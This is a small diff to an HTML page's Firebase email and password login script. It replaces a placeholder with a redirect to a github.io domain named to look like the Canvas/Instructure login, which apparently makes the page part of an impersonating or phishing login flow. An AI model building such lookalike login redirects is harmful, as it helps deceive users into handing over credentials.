--- a/new.html
+++ b/new.html
@@ -60,7 +60,7 @@
   signInWithEmailAndPassword(auth, email, password)
     .then(() => {
       // After successful login, redirect to a new URL
-      window.location.href = "YOUR_URL_HERE"; // Replace with the URL you want to use
+      window.location.href = "https://canvas-login-instructure.github.io"; // Replace with the URL you want to use
     })
     .catch(error => alert(error.message));
 };
